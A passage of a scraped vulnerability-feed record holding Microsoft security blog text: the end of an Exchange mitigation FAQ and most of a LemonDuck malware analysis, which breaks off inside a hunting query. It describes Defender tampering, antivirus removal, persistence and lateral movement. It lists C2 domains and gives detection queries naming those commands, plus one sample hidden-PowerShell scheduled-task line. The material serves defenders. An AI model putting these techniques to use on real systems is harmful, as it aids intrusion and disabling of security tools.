machine.\n\n**Q: Is cloud protection required to receive the mitigation?**\n\nA: No. However, enabling cloud protection is a best practice that will keep you with the most current protections against the ever-changing threat environment. Customers are encouraged to enable cloud protection.\n\n**Q: What can I do if I don\u2019t have Microsoft Defender Antivirus?**\n\nA: Use the One-Click Microsoft Exchange On-Premises Mitigation Tool found [here](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe post [Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-18T22:00:47", "type": "mmpc", "title": "Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T22:00:47", "id": "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3", "href": "https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security 